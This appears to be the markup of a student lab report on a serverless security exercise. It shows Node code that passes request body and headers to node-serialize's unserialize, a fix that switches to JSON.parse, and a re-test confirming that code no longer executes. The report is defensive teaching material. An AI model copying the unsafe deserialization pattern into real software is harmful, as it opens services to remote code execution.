          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>serialize.unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>event.body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">headers = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>serialize.unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>event.headers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D344052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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="579C045D" wp14:editId="176044AC">
            <wp:extent cx="4851400" cy="499533"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62707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39710" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:srcRect l="1" t="18125" r="1992" b="48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696" cy="499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44835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AFTER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2D87E" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>JSON.parse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>event.body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">headers = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>event.headers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11583F4E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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="633728A3" wp14:editId="561EF138">
            <wp:extent cx="3208867" cy="423333"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111787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1176" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect t="38272" r="1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316" cy="423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14B89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583B8316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Removed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E20C54C" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialize = require('node-serialize');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3DE5E7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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C18E2C8" wp14:editId="61C11302">
            <wp:extent cx="5019048" cy="342857"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="199110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7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9AF8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5CAB03F1" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C32B50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Re-run exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05617216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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47031369" wp14:editId="5C0C7B42">
            <wp:extent cx="5731510" cy="633095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16858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80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5730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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B791D3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{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>status":"err","message":"Missing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> authorization"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6206C5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CloudWatch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA9978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lastRenderedPageBreak/>
        <w:t>No events found</w:t>
      </w:r>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65E18431" wp14:editId="17993740">
            <wp:extent cx="5731510" cy="1397635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="22018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99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6BA2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 xml:space="preserve"> No execution → vulnerability fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203F3EE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5CB1AF46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279E0B04" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75195238" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545C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5CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Structured Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67743044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Table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658"/>
        <w:gridCol w:w="1585"/>
        <w:gridCol w:w="1233"/>
        <w:gridCol w:w="1365"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE726B" w:rsidRPr="00F545CF" w14:paraId="10FBBDB1" w14:textId="77777777" w:rsidTr="004B1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C9FB4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537B806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Intended Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359B8CEE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2B7A5CA1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04061FC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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE726B" w:rsidRPr="00F545CF" w14:paraId="1985BAA6" w14:textId="77777777" w:rsidTr="004B1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EB2C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Vulnerable Dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F52AF7A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Input should not execute code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2222D9E0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2E0D3846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No execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C349D5C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Code executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A563F2F" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE72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14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:pict w14:anchorId="23E68860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19C2AF7D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Table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021"/>
        <w:gridCol w:w="1460"/>
        <w:gridCol w:w="2082"/>
        <w:gridCol w:w="1255"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE726B" w:rsidRPr="00F545CF" w14:paraId="0A6BFBBF" w14:textId="77777777" w:rsidTr="004B1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317D7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9466D3F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Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD9D112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8366871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5A51AD23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Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE726B" w:rsidRPr="00F545CF" w14:paraId="71B96452" w14:textId="77777777" w:rsidTr="004B1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94AB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Vulnerable Dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A454C7F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Unsafe deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F947F06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Security misuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ED9EFAE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Remove node-serialize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CCD2A1" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="004B1289">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F545CF">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t>No execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="704A84F6" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE72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14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:pict w14:anchorId="5E0A864B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75DBD636" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00AB1A1F" w:rsidRDefault="00CE726B" w:rsidP="00CE726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B1A1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Takeaway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5D7C5" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00F545CF" w:rsidRDefault="00CE726B" w:rsidP="00CE726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F545CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This lesson shows that using unsafe third-party libraries can introduce severe vulnerabilities. Proper input validation and avoiding dangerous deserialization functions are critical in serverless applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545CE7BE" w14:textId="77777777" w:rsidR="00CE726B" w:rsidRPr="00CE726B" w:rsidRDefault="00CE726B"/>
    <w:sectPr w:rsidR="00CE726B" w:rsidRPr="00CE7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5C12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D54EA7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278D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED52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F18D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9446B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06A57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7FCB50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144A46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC0E87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1360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958899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62527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574417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635368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0055330">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="891231867">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1718117935">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="91977608">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="466897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6B"/>
    <w:rsid w:val="000334C8"/>
    <w:rsid w:val="006E2CDC"/>
    <w:rsid w:val="00703E5C"/>
    <w:rsid w:val="00CE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F09D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{789FCC9C-E88F-4B23-9806-D346AB4E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26B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CE7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ABDULWAHAB ABDULLAH BADIRAH</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ABDULWAHAB ABDULLAH BADIRAH</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-04T12:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T12:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>